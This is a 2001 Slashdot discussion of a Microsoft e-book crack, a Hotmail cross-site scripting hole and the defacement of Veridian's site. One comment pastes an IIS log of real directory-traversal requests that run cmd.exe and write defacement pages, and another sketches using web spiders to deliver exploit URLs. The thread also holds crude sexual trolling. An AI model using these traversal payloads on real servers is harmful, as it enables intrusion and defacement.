Slashdot Mirror
MS Security: On A Path As Clear As It Is Reliable
bobthemonkey13 writes: "It appears that Microsoft's 'secure' E-Book system has been cracked. MIT Technology Review is reporting that an anonymous programmer has figured out how to bypass the 'advanced antipiracy features' in Microsoft Reader. This sounds a lot like what Dmitry did except for two things: The MS E-Book hacker has (wisely) decided to remain anonymous, and he's not publishing his program. God bless the U.S., where moving a book from your home to your office is a federal offence."
Along similar lines, an Anonymous Coward indicates this story at USA Today titled "Expert Hacks Hotmail in 1 Line of Code." "I'm in awe! Unless someone can figure out how to execute pseudocode or half a line this isn't beatable. I hope this get's fixed or the whole future of pay-per-view web services could be impacted. :-q" Good thing Microsoft isn't quite sure what to do with all this universal-password stuff. (Thanks to Sacha Prins.)
Jamie adds:
In other news about poor security where you least expect it, Kitetoa informed Veridian a little while ago that: "Any script kiddy can root your web site. And... By the way... Someone already did it (as you should have seen at www.veridian.com/upload/ if you knew anything about internet security)."
I don't know what that URL gives you now, but as of this writing, and for the last several hours, it's read:
fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn
This is the same Veridian that the Defense Department picked to track computer network attacks on DoD systems, specifically attacks coming from China.
This is the US, after all. Get it right.
did anyone *really* think that anything from M$ would ever be "secure"?
I mean, c'mon.... who the hell do they think they're fooling?
this guy should upload the code to freenet where, hopefully, it is impossible to remove the program or discover the author. This is the exact kind of thing freenet was designed for, so if the author is out there in slashland, go for it! Civil Disobedience ra ra ra!
Well, I also cracked the MS e-book but this margin isn't wide enough to show proof.
not to use it, i'm just curious what he coded it in? perl? shell with netcat or something? java? i must admit i don't know a damn thing about this cross site scripting baloney... ahh for the old days of cgi scripts and html and that's it...
The unfortunate thing is, that while it seems "M$ software gets hacked every other month", the general consumer isn't making security (or I should the lack of it? :) a big deal.
... but that headline is simply hitting way below the belt. There's plenty of security holes in every stock Linux distro too, you know.
- A.P.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
The difference being, there are things that Microsoft is trying to do that the OS community will never attempt (part because we consider it unethical, part because we consider it impossible).
Everytime I read about hailstorm, I am in shock but at the same time scared.
First, off I can't believe that Mircosoft thinks they should be in control of so much personal information.
Second, that Microsoft thinks they can somehow keep it safe.
Third, and this is what scares me. A lot of John Q. Public will give them all this information.
Better them than me I guess.
Comment removed based on user account deletion
As far as the ebook thing is concerned, so what? Near my home is a place called a library, and in it is a device called a photocopier. I've been able to make copies of books electronically for years. Next please.
You're using her as bait, Master!
With new forms of active content being added to web pages all the time, it is amazing that anything with dynamic content. I know that's vague, but that sounds like the gist of it.
"Yet the more convenient and flexible Microsoft and others make the Web..."
Microshaft making the web more convenient and flexible?...I beg to differ.
M$ is to the web (and innovation in general) what a blanket is to a fire - A retarding agent.
Freenet is not really the only solution if the programmer chose to release the program and not reveal his identity. There are numerous other channels available which will let him preserve his anonymity. The only advantage to freenet is that is at least has a somewhat legitimate charter, where as other methods are typically underground and shady.
But still, if done properly, it could be released and spread without anyone finding out who the author is. The danger is if that person ever told ANYONE about it. If he did, then he's not truely anonymous, and given enough of an incentive, someone might be tempted to talk. At least, without releasing any code, then its technically all heresay and a lot less likely to be in violation of some strange law.
I fear however that this is how it will have to be done in the future if the silly laws don't get overturned. Either that, or some REALLY important sensitive document will have to be cracked and released publicly to the embarrasment of a large organization with a lot of people chanting "we told you so" before those in power might take a second glance and realize that perhaps peer review for security is a good idea after all.
-Restil
Play with my webcams and lights here
Did anyone ever wonder whether M$ do this deliberately?
;)
Recently they've had some holes (much like this) that you'd have to be out of your head smoking crack to miss.
Quality assurance at Microsoft is better than this when it comes to other areas. Could it just be that it's easier and cheaper to have somebody else find the holes and then, as the mega-funded publicity department goes into top gear issue a patch (where appropriate)?
Either that or Microsoft buys a lot of crack!
"How much truth can advertising buy?" - iNsuRge - AK47
Oh, great! Looks like what people have been saying will come true -- The DMCA will stifle innovation, quality, security,.... etc. Now whenever there's a flaw in something, people will be too afraid to report it, for fear of being prosecuted under the DMCA. Back to the Dark Ages for us!
I've never liked USA Today as a news source.
The headline clearly reads, "Expert hacks Hotmail in 1 line of code". Then in the second sentence of the first paragraph, "It took just three lines of code for Grossman to breach Hotmail filters..."
Brilliant reporting. Whatever generates page hits I guess...
while true; do telnet www.hotmail.com 80 <
Then just sit back and wait.
On a related note, i'd like to dispel a common myth. Real Programmers don't use 'cat > a.out' or 'cat
--
Mod up a post Rob doesn't like and you'll never mod again
So, let's say that MS Hailstorm is implemented and within a couple of years, a good portion of users have their data and software settings stored on .Net servers, and can access it with their Passport login and password.
Now let's say that someone finds another flaw in passport (I know, hard to believe, but go with me here). Needless to say, Hailstorm users will be left vulnerable. The question is, will the Hailstorm and Passport EULA protect MS when it comes to legal liability for a) lost data, and b) copied or stolen data (loss of intellectual property, etc...)
My guess is that even if they are to blame, MS won't be legally liable. Doesn't sound like a good choice for users...
Buy Hex-Rated Stuff, fight the DMCA!
did I read that cnet article right, or did they say, with a straight face, that Microsoft's big announcement was that they said they'd think of something by 2002?
:)
Um.... wow.
A year ago I would have been much more inclined to agree with you... but it's kinda funny. As time goes on, Windows seems to have more network services, and more problems, while Linux distros are becoming more sane and simple, follwoing OpenBSD's lead...
It took just three lines of code for Grossman to breach Hotmail filters and access Passport ID and credit card data. The second time it took just one line. And the former Yahoo security auditor says he could do it again given 8 hours.
- sigs are for wimps.
the program doesn't exist.
I understand not wanting to be the next DMCA victim, but really, if the code isn't out there, then, it doesn't exist in my eyes.
ZOMG I WOULD LOVE TO KNOW ABOUT YOUR FEELINGS ON MACINTOSH VERSUS WINDOWS, VI VERSUS EMACS, AND HOW YOU'RE NOT A DORK
I don't really know why any large company would sign on for Hailstorm. No one really wants to be tied to any specific vendor for such an important part of their business. Granted, they're already tethered via their desktop PC's, but incorporating Hailstorm in to your business plan? You're basically putting your chance of profit in the hands of MS, who has a well known history of screwing over its own partners.
The problem, as I see it, is that American Express and others can beat their competitors to the punch by being a part of Hailstorm, providing services no one else does, but that goes with extreme risk. I guess that's why they haven't signed a contract with MS yet. It's a tough one for any company.
"I may not have morals, but I have standards."
As soon as the data leave the server and digitally lies on the client machine, it'll get cracked. We've seen and heard it a thousand times before (ie. don't trust client side data in any cgi)...
Any when you've got thousands of crackers, who want to be the first to crack the next latest thing, it's only a matter of time. I guess the only way around something like this is to have the data reside on the merchant's server and out of the hands of the client, but until we all can access the internet from everywhere, that won't happen.
- [grunby]
Well, this is strange. I'm sitting on a Windows 98 box with McAfee VShield v4.0.3 installed and virus definition files from 2001/06/13. Whenever I try to go to http://www.veridian.com/upload/ with either IE 4.01 or Netscape 4.70, McAfee pops a warning dialogue saying I have just downloaded a worm called "SunOS/BoxPoison.worm". I also have a small Perl program I can use to perform command-line HTTP downloads, and with it, I can download the page at http://www.veridian.com/upload/ without any problems.
I'm probably getting the warning because something in the HTML code matches the signature for a known worm. But still, if the message on the site isn't enough to scare people, the warning from their virus scanner certainly will!
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://www.veridian.com/upload/index.htm
Date: Fri, 31 Aug 2001 03:51:47 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 09 May 2001 12:53:30 GMT
ETag: "6a8163c87d8c01:943"
Content-Length: 289
(Slashcode has inserted a few spaces into the following HTML... I hope this doesn't trip your virus scanner...)
<html><body bgcolor=black><br><br><br>< ;br><br><br><table width=100%><td><p align
="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="cen
ter"><font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</htm l>
By this time amendments to the DMCA will probably allow them to have potential litigants summarily thrown in jail.
You're using her as bait, Master!
looks like ms is really testing the limits of their PR team. Maybe they might meet their match this time.
Got Freedom?
Thinking?
Among the headers from the veridian server when I retrieved the hacked page was
Last-Modified: Wed, 09 May 2001 12:53:30 GMT
I'm sure they'll get to it in due time...
Buy Hex-Rated Stuff, fight the DMCA!
I thought one of the golden rules of any sort of engineering is that before you try to do something, work out whether you can do it or not. Then try. Otherwise, it's all just wasted effort.
Am I the only person who thinks the whole concept of e-book encryption with the goal of stopping dedicated piracy is pointless?
Encrypting the contents of a transmission between two parties so that no 3rd party can read it is do-able, and has always been the main thrust of encryption. But what people like Adobe and Microsoft are essentially trying to do is make it impossible for the second party to read the message - because as soon as you read the message, you can reproduce it.
Assume that Adobe/Microsoft encrypt this with something that will provably take an untenable amount of time to crack - say 1024-bit public key encryption (sorry, IANACryptologist, I don't know the proper term.). I won't be able to crack the book itself, but since it appears on the screen at some point, I'm going to be able to read it sooner or later - and I can copy it.E-book encryption is the equivalent of the club lock - it'll stop casual copiers, not the dedicated copier - and this approach will only work until the first dedicated copier writes a program to let everyone else do it.
The same is true of sound files, though maybe not to the same level, as the concept of digital watermarking can be applied. I still think the same rules apply. As a result, I can't help but think of the whole e-book and sound-file encryption push as smoke and mirrors, meant to convince people that bits can be made uncopyable.
-- This post is about truth, beauty, freedom, and above all things, Karma
unlike *X, which has had peer review, troll review, flameage review, and intense discussional review between Buddha, Allah and God and the largest pool of software talent on the planet (literally)
MS source has been locked away in vaults in Rancho Redmond...doled out sparingly under a NDA that would allow MS to summairily repo your grandchillins
it has been reviewed by a relatively very small pool of some very talented, but frequently inexperienced programmers/developers/architects who are under massive pressure to deliver the next upgrade in MS on schedule or find themselves getting transferred to the code maintainance on MSN if they insist on any QC effort that would slow down delivery....
the "debate" between open source and closed, may well be the race between the tortoise and the hare
security has NEVER been a high priority at MS, more like extra chrome trim on a car....
and the more MS gets deployed in "financially attractive" or "critical" situations, the more exploited its gonna get
Hailstorm should probably be renamed "Hail Mary", for all the praying they'll be doing over its security
Ten quid, she's so easy to blind. And not a word is spoken...
Just so we're clear - is this the ISO with the unique identifier that The Reg talked about the other day?
cmon it's a huge pain to search the web for a windows cd key when you reformat cause you got h4x0r0ed and need to check outlook express & play solitare
Or.... God bless the US, where I can make something new and exciting and have it stolen from me, and with people like Stallman, actually turn around and point some moral wagging finger at ME!
Or... God bless the US, where picketers and protesters fight with hatered, anger, bigotry, intollerance and violence against things that they claim are bigoted and against human rights? The USA, country of illogical and irrational people that would sell their own mothers for the right price and then turn around and point their hypocritical fingers at someone else. The country where processes are loved to the point that results are ignored and facts are shunned.
...was the actual content of the page, which coincides with strings in the actual virus itself that VirusShield is looking for. The virus that infected the machine must carry a copy of the page verbatim inside itself, and that is one of McAffee's clues to finding it.
Black holes are where the Matrix raised SIGFPE
Microsoft's favorite security model - security through obscurity - has vary little to do with Hailstorm and everything to do with the DMCA. Not only does the producer of the security mechanism simply not publish the details of that mechanism, but through the wonders of the DMCA, Microsoft is empowered to enforce their security model by preventing the publication of holes discovered in the security system, thereby maintaining the obscurity.
Sarcasm aside, does it really matter how secure hailstorm really is, ig Microsoft can sue into oblivion anyone who publicizes or even researches security exploits related to the system...?
--CTH
--Got Lists? | Top 95 Star Wars Line
Linux manages to sucessfully use the same OS for both workstation and server purposes. In fact, I'm quite glad that my workstation doubles as a server for testing purposes, and that I am able to work on my servers in a pinch. Linux sucessfully combines all the good aspects of both workstations and servers; why can't M$ do the same?
Even Slashdot wants to hide some things
I used to work as Microsoft, MS Press and MS Research. While at research I needed to hack IE so it would forget about ActiveX security, I managed to reckon the registry settings but still had some questions.
The place to ask questions to other developers internally is via Outlooks groups (like usenet), it's surprising there isn't a better channel to converse with other Microsoft developers, maybe there is, but that's all I knew about. Anyway, so I posted a question to the IE-dev group about my problem. The response was surprising, the lead PM of IE started flaming me, telling me about how Microsoft can not have any more exploits in IE, how I my manager would be informed etc..
I guess I should have mentioned that what I was doing was only going to go out to a few select terminal ill users.
The point I'm trying to make is that Microsoft is a large company made up many small groups which don't necessarily talk to each other, I'm not saying this in there defense, but it helps explain how so many problems can arise over and over again. Even if I had just went ahead and implemented this IE hack into something major I don't who would have held me accountable, as far as I know software does not need to go through a standard security audit, each group has there own QA which will vary wildly.
-Jon
this is my sig.
No alarm for that page.
Suppose a company hates someone. It can invent a kind of "e-book" security using, say, a modified ROT-13 algorithm. Then challenge openly the guy to crack it. He does that and publishes his results. Now, can the company can use DMCA to put that person in jail?
¦ ©® ±
That's easy. I can do that too. Type GOD on your Run Command dialog-bar in the StartUp menu.
Can anyone clearly explain cross-site scripting?
I've seen a few explanations of it but they didn't make any sense. I'm slow like that.
or a message from microsoft?
Would /. submit my ID and collaborate with the FBI? or would /. lead the civil disobedience to fight these stupid laws?
This is really boring.
Thank God we have Adequacy.org! Adequacy.org is the internet's most controversial site! Check out Adequacy.org today!
Damned, close your tags! Netscape Navigator doesn't show unclosed tables!
Proper HTML in your viri and hacks please!
bash$
But, unlike with M$ products, you can plug them, since you have the SOURCE.
From the Hotmail article above..
Grossman wasn't out to steal. Instead, he alerted a grateful Microsoft, which patched the holes before a malicious hacker could exploit them.
Why Didn't M$ just sue him under the DMCA? That seems damn much like the general feel US Corps have today, are we actually seeing some good side of Microsoft now? (naah)
> There's plenty of security holes in every stock Linux distro too, you know.
Yeah, on a dual boot machine you can hax0r Linux in one line, by typing msdos at the LILO prompt.
Sheesh, evil *and* a jerk. -- Jade
> > There's plenty of security holes in every stock Linux distro too, you know.
> But, unlike with M$ products, you can plug them, since you have the SOURCE.
And increasingly important, you can talk about them without fear of drawing a Go To Jail card.
Sheesh, evil *and* a jerk. -- Jade
What is wrong with keeping information on Your computer ready to fill in forms? That is exactly were the information belongs not on MegaCorp central database.
If there was a standard on form tag names such as FirstName, Address1, HomePhone, etc. then it would be a simple thing to build browser functionality to fill in forms automatically when requested. This would eliminate the need to "register" at e-commerce sites and would make Microsoft's push into providing authentication service moot.
Geez, slashdot, I'm glad you finally decided to post a story about this. I guess my two earlier submissions weren't enough of a hint.
"who has a well known history of screwing over its own partners."
Care to provide some examples?
The company I work for has partnered with Microsoft last year on their homeadvisor.com website. The section we worked on turned into a failure and the plug was pulled less than a year later, but Microsoft refunded to our company our investment into the site.
I knew someone else back in '94 who started a small company that was partnered with Microsoft and writing utilities for Windows NT. Microsoft helped them startup, paid for an ISDN hookup into their office so they could more easily communicate with Redmond, and then two years later bought out the company and moved them all to Redmond. The guys were more than happy to make that move!
Every company I'm aware of that has partnered with Microsoft has been treated very fairly.
Even Seattle Computing which provided the original MS-DOS was treated very well. While the initial contract was for only a few thousand, they received much more than that over time, and many of the companies employees ended up working at MS and becoming some of their early millionaire programmers.
I guess I'm curious about this well known history.
This seems like a case of "I hate Microsoft, and I'm going to say whatever I can to try to make them look bad, even though I can't really justify it."
I was just reading a fascinating article in the latest phrack about using web spiders (like search engines, etc) to deploy exploits, by putting URLs on a page which are actually exploits (like the code red explot) and waiting for the spider to follow them. Many spiders pick up the URL, port, query string, and all.
This could be used to distribute data..here's how:
This guy could take his program, compress it, and encode into ascii and divide into N chunks.
Pick P web sites that might like to see the code (peacefire, slashdot, 2600, CNN, whatever). Then code up N*P links all over your web site, that look like this:
where <DATA> is one of the N chunks (plus some data saying which chunk it is, etc) and <SITE> is one of the P sites. Then wait for search engine spiders to index your site (most sites have them coming regularly).After a few months, the target sites will all have the data in their logs as the spiders follow your links!
This could be improved many ways, for instance the URL links could be spread over many hosts so that it is harder to track down the original source, the chunks could be encrypted, the receiving sites could automatically re-create the links so the data is kept circulating, different spiders could be fed different chunks, etc.
Sort of like a Freenet using search engine spiders as the transport. Has this been done? Time to get coding!!
'cuz you can make a lot more money if you throw in a few more features into your standard OS, give it a new name, then charge people even more for it.
Using the Jim/Carol/Bob terminology...
If Jim wants to send Carol some information that they BOTH don't want Bob to see, no problem. This is the intent of crypto.
However, as soon as Carol decides that she doesn't mind Bob also getting the information, it is all over. No amout of crypto can prevent that transaction.
Given this quite obvious fact, it suprises me that ANY real crypto guy would even bother touching this problem.
While I agree with you in principle, this does tickle something in the back of my brain. If the DMCA causes so many people to wish to remain anonymous when they discover a vulnerability, why not FLOOD the media with bogus exploit reports? Just claim you won't release it due to the DMCA. Eventually, if enough random hackers do this, and enough people buy it, there will be so much paranoia of "hidden" exploits, that eventually somebody will call for mass disclosure. And the only way this can happen is for global DMCA amnesty.. similar to what brought about whistle blower legislation.
lick my shit covered cock and like it bitch
"No one has treaded here," said Evan Quinn, of the Hurwitz Group. "You are talking about changing the paradigm of how business and software works. They will provide an example for the rest of the industry regarding how to implement Web services."
Mr. Quinn, your attention is invited to:
here,
here,
or here
to see where the ground has been tread, the flag has been planted, and the ground has been tilled regarding paradigm changes and setting the example.
MSDOS...stolen idea.
Windows...stolen idea(Amiga)
MS Word...Wordperfect
Access...yep they invented databases too.
Excel...they added a gui.
the list goes on. The only innovation from Redmond has been from the Marketing department. But I preach to the choir.
Point is, if you really believe what you are saying to be true, I am sorry for you.
Have a nice day.
Drop me a line at:
Key ID: 0x54D1D809
My company (nameless for now). We are a MS "partner". A few weeks ago, they suddenly decided to tell us that they were developing the exact same software as our product, and they thanked us for all the help we had given them. If we want, they will let us continue to be a "partner" and give them our great ideas for as long as we still have funding (which runs out in December).
"Your superior intellect is no match for our puny weapons!"
But the difference in attitude is *obvious*.
Consider this experience: I'm sat in front of a Win2k server. If I turn off every single service I can, (including the built in FTP which requires IIS Admin, which starts opening up stuff just above 1024) I'm still left with 445 (TCP and UDP) - the SMB endpoint, and 135 (TCP) - the RPC endpoint mapper.
If you want to get rid of those, you'll have to firewall them.
MS has always made the tradeoff in favor of usability; let's not pretend they'll change overnight.
If those in the content industries have their way, you won't be able to for much longer.
From one of the articles: .. to dream up very, very bad scenarios," says Shawn Hernan, security analyst for the federally funded Computer Emergency Response Team
"It's easy.
Pulease, I'm the last one to trivialize this whole thing, but reading this from a "federally funded" organization smells like FUD to me.
Sure you can dream up that stuff, where else would yer company be, right?
Keep in mind not everyone agrees with that sentiment. Some would argue that, if you discount the numerous security issues, Microsoft has perhaps the strongest track record of innovation in the industry. <----- Read it and see what I mean.
We know it's bunk. They ought to know it's bunk, and yet they don't.
sigh.
Is there evidence to prove that MS Reader has actually been cracked? I mean, he hasn't shown any code, he haasn't posted an cracked e-book.
Hell, I could claim that I just broke into the CIA. I know where Elvis is and I know who killed JFK, but the DMCA won't let me tell you.
From the cover sheet of the DMCA legislation:Basically, the DMCA is simply the mechanism withing the United States, of implementing the WIPO treaty. Any country that is a signatory to this treaty will be implementing DMCA-like legislation. Just give it some time...
For those, who are unfamiliar with the history of Intellectual property law, the EFF has a good primer.
--CTH
--Got Lists? | Top 95 Star Wars Line
Some time in April I setup a Windows 2000 server just to play around with. I threw a few nics in it and played with routing so I could choose whether to use Telocity or Road Runner depending on which connection gave me the better ping to quake servers. I also used it for NAT and I wanted to learn ASP so this seemed like a decent plan.
/scripts/../../winnt/system32/cmd.exe /c+dir 200 -
/scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
/scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
/scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br ^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^< td^>^<p+align%3D%22center%22^>^<font+size%3D7+colo r%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^ <p+align%3D%22center%22^>^<font+size%3D7+color%3Dr ed^>fuck+P oizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<fo nt+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.co m.cn^</html^>>.././ind ex.asp 502 -
/scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br ^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^< td^>^<p+align%3D%22center%22^>^<font+size%3D7+colo r%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^ <p+align%3D%22center%22^>^<font+size%3D7+color%3Dr ed^>fuck+P oizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<fo nt+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.co m.cn^</html^>>.././ind ex.htm 502 -
/scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br ^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^< td^>^<p+align%3D%22center%22^>^<font+size%3D7+colo r%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^ <p+align%3D%22center%22^>^<font+size%3D7+color%3Dr ed^>fuck+P oizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<fo nt+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.co m.cn^</html^>>.././def ault.asp 502 -
/scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br ^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^< td^>^<p+align%3D%22center%22^>^<font+size%3D7+colo r%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^ <p+align%3D%22center%22^>^<font+size%3D7+color%3Dr ed^>fuck+P oizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<fo nt+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.co m.cn^</html^>>.././def ault.htm 502 -
/scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
:-P
I installed the first Service pack at whatever point it came out (I don't really recall) and thought I would be okay. Well, I wasn't, and I didn't discover that I wasn't until the whole code red thing. Here's part of my IIS log from a day in May, less than 2 weeks after having Win2k up and running :
[my IP has since changed]
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-05-06 01:36:54
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-05-06 01:36:54 212.164.32.40 - 24.29.76.248 80 GET
2001-05-06 01:36:54 212.164.32.40 - 24.29.76.248 80 GET
2001-05-06 01:36:55 212.164.32.40 - 24.29.76.248 80 GET
2001-05-06 01:36:55 212.164.32.40 - 24.29.76.248 80 GET
2001-05-06 01:36:55 212.164.32.40 - 24.29.76.248 80 GET
2001-05-06 01:36:57 212.164.32.40 - 24.29.76.248 80 GET
2001-05-06 01:36:57 212.164.32.40 - 24.29.76.248 80 GET
2001-05-06 01:36:57 212.164.32.40 - 24.29.76.248 80 GET
etc...
Looking through the logs, I was owned at least 30 more times until I discovered this at the end of July. Some said fuck USA government, some said fuck China government. I thought this was a code red exploit, but apparently not, as this happened on May 6 2001 and code red was (to my knowledge) first discovered several months later.
Anyway, I just find it appalling that MS would release a product that they expect people to use for commerce and "real" applications with a hole like this. I don't know if there was a patch for this or not, because frankly I was so disgusted with this that I formatted and installed linux. While I understand that the admin shoulders a great deal of the responsibility for the security of his boxes, and that no software is without its exploits, I think such a gaping hole in a flagship product is inexcusable, and I really marvel that Microsoft has not been held accountable for the shoddiness of its products. I feel bad for the MS sysadmins who have to deal with this kind of garbage on a much larger scale (both in the number of attacks and the number of machines they must "protect"). But then again, it's probably some MCSE writing all of this crap just to create job security for himself and the rest of the MCSEs out there...
rooooar
Why can't people use apostrophes correctly these days?
I don't understand exactly what this cross-site scripting is all about and how it can defeat firewalls etc, but does it really mean that all websites are even less secure than Hotmail??
This sig under construction. Please check back later.
- Say you've done it
- Try to do it
- Study feasibility of it
Note that steps 2 and 3 are optional.rooooar
Your writeup was awful. And what loser submits a story TWICE? We decided your karma whoring was too lame even for us, so we dumped it.
Sincerely,
Slashteam
Interesting...and what crackhead moderator thought "Offtopic"? Honestly.
The actual "hack" then is the "smartness" to merge these two together, compile it, and run it. Whoever does that is the "cracker" who made a program that cracks eBooks, not the original two authors...
Could it work ? :)
B. Peers, login fuxored
If you want to get rid of those, you'll have to firewall them.
You don't firewall anyway?
- A.P.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
Really. Slashdot has gotten more and more close minded. I can't respect this crap anymore.
Don't worry, you'll still get hits from me. I'm not going to post anymore except to spam.
Once the public in general trusts their personal data, credit card numbers etc to MSFT (including politicians), sooner or later they will feel betrayed by this company (when, not if, someone steals their data and misuses it).
This might just be what's necessary to once and for all turn public opinion against this evil empire.
ComponentSource has added support for Passport and is building in a new HailStorm notification service that will allow the Web site to inform its customers of new products through a variety of ways, including instant messages, said ComponentSource Chief Executive Sam Patterson.
Can you say "SPAM!"
He probably used perl. If you can't do something in one line of perl then it's probably not worth doing.
So sysadmins who can't be bothered to download the MS patch, will each be bothered to write security code for an entire operating system, and get it *right* ?
[lapis]~>wc -l reallyMeanCrack
40882 reallyMeanCrack
[lapis]~>cat reallyMeanCrack|tr '\n' ' ' > reallyMeanOneLinerCrack
Unable to read configuration file '/bigassraid/htdig//conf/14229.conf'
Geocrawler error message.
I find this comment in the CNET article amusing:
AOL Time Warner could not be reached for comment...
The whole of AOL can't be reached? Every member of its untold millons of employees happened to have their phone switched of that day I guess.
Actaully IP filtering is built in. You just need to turn it on and configure it.
Or just "[boot name] single". Most distros don't bother to require a login at the single user runlevel. I can see how this can be a Good Thing (i.e., libcrypt is fux0red), but if that computer is in a public place, yer screwed.
--
#nohup cat
This brings up a good point about transfering data to humans: its difficult to do without the data going all over the place. Through sound waves, light waves, radio...
Now if we could just get everyone to embed those neural connectors in their brains with built in decoding algs and a really private key... well until the nanobots... which infiltrate your blood stream and go to your brain to read the storage device... but oh no! its not magnetic storage, its a molecular computer, so they can't read it... not until they melt a small hole in it... but you have a newer self upgrading chip which has defenses... uhm nevermind.
Privacy is dead... deader than deaad... privacy is in the TV... its all in your head. --Marilyn Manson
"Life, loathe it or ignore it, you can't like it."
- Marvin, the Paranoid Android
I heard year ago about lecture which was held by one publisher company. When students asked lecturer's opinion about eBooks, he just showed how to crack that *.lit- format (And he just downloaded one tool from the Net). Then he bitched something about M$ quality...
I'm outside the US, and have no intention of ever visiting it as long as the DMCA remains in place.
If anybody would like to publish some code that violates the DMCA, forward it to me and I'll publish it immediately on a subdomain of tech-mad.org. No need to supply your identity or any other details.
Bzzzzzt..."AAAAaaaaarrrgh!!!" Thud.
I guess having code to decrypt the encrypted .LIT files would be useful if someone wants to give you a copy of their bought MS Reader E-Book. However, currently it is very easy (in Windows) to use software like Wintask to automate the copy and pasting of each page of the book into Notepad. It's quite a fun process - watch it automatically going through every page copying and pasting the entire book - takes about 3 mins. Then presto - you have it in TXT format, and the person who copied it isn't traceable. You can then read it in Linux or convert it to Gutenpalm format to read on your Palm - or give a copy to your friends or post it on alt.binaries.e-books. For a while I was looking into how to crack these .LIT files, but once I realised I could do the above, there was no longer any point.
Does anyone know how Hailstorm fits in with the UK's Data Protection Act legislation? Does MS become the owner of the data? If so it's up to them to take "reasonable measures" to guarantee the security of the information. If they fsck up, then - IANADPL - they could be in deep shit. Similarly, the physical location is important. Sending personal data outside of the EU without permission is against the DPA - that could happen just in a server replication.
Any DPA experts out there?
Is there similar legislation stateside?
This sig made only from recycled ASCII
I must have missed the boat on this one.
But why does the slashcode insert spaces into URLs etc., especialy URL's that are't even <A>-links?
Is it supposed to reduce goatse encounters or something?
i've posted approx. 10 times on /., but have never been modded above a 2. I often wonder what it feels like to have a +5, and I was all set to find out, but then I realized that the time it would take me to think of something deserving of a 5 wouldn't make it worthwhile. So instead, I'll post some insightful comments that won't be labelled that way.
- Linux is not more inherently stable than Windows. The fact is that Linux users are generally much more experienced using computers than the average Windows users and therefore can make his/her computer operate the way he/she wants to. It has very little to do with the operating system itself. Windows is also unstable thanks to applications that are idiot proof (they take over a good number of system resources, and if you something unexpected happens, a crash happens or worse a chain crash). Experienced Windows users without idiot-proof software have systems that purr.
- In general, the Windows user is less experienced than a Linux user because Windows users tend to have a life. This means that at certain times they 1) shut off their computer without worrying about their uptime, 2) go outside, sometimes in direct sunlight 3) communicate with others in their species, including the female gender and maintain relationships with these people and 4) periodically engage in consensual sexual relations with others in their species. Linux users 1) brag about their uptime to anyone who will stand still long enough to listen on IRC 2) play Quake2 and harass other users over the network (and consequently get their ISP to suspend their account - read below) and 3) cap the night off by packeting their favorite irc server/irc user/website
- Not surprising, studies have indicated that people who run Linux are more likely to get their Internet connection suspended or terminated by their ISP. Admittedly, this is largely due to people on @home running illegal web servers, but not an insignificant amount is caused by harassment on IRC and other lame behavior. In other words, Linux == social retards.
- There have been rumors that I sucked Hemos dick. Let me put these to rest right here - I did suck Hemos' dick but it was for 1 gram of weed. He said it would be 1g of shitty shwag, but I sucked dick so well that he gave my 1g of chron from his fat sack.
- I did have sex with your _____ (fill in mom or sister here, depending on which one(s) are alive and the level of hotness) and i busted in her, but now I have some sort of disease. So fuck your mom/sister/whatever.
Cut the binding with the filesharing on TCP/IP (In the Network card applet). And indeed you should be firewalling anyway as said "Wakko Warner".
Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
"God bless the U.S., where moving a book from your home to your office is a federal offence."
That's funny, I recall taking home an industry mag from my IT desk just yesterday. Oh wait, you want me to copy each page in a professional photo-copier, with pictures, rebind it, and include the copyright notice the original publisher placed at the bottom, so I can have an additional copy at home. That seems perfectly legit.
Please...
You didn't make an excellent point; indeed, the very fact that you suggest that you did is a further pointer to smugness.
The word "sic" means "thus", and does not necessarily suggest that the word for which it is being used has been misspelled, but that its original form has been retained.
What precisely are you calling "artistic license"?
And I'm posting as an AC because I'm not at my own PC, don't remember my password, and don't have access to it. And, of course, because I'm a karma whore like everyone else.
You ever heard of guerrilla warfare? Instead of random acts by script kiddies, we are seeing electronic warfare by nations and political groups. Now that the separation between corporate and business interests has disappeared, is a blow against corporate tyranny any different that blows against some government?
Freenet is the outback, the deep forest that hides the liberator/bandit.
photosMy Photostream
Hmmm... The Science of Cracking.
Seriously, get one of these universitys that go over the internet to make a department, then have them claim the DMCA interferes with science, their right to publish, and etc.
I would contribute $0.02 to it. (Oh, wait, I have.) Yes, this is a joke, if you can't tell.
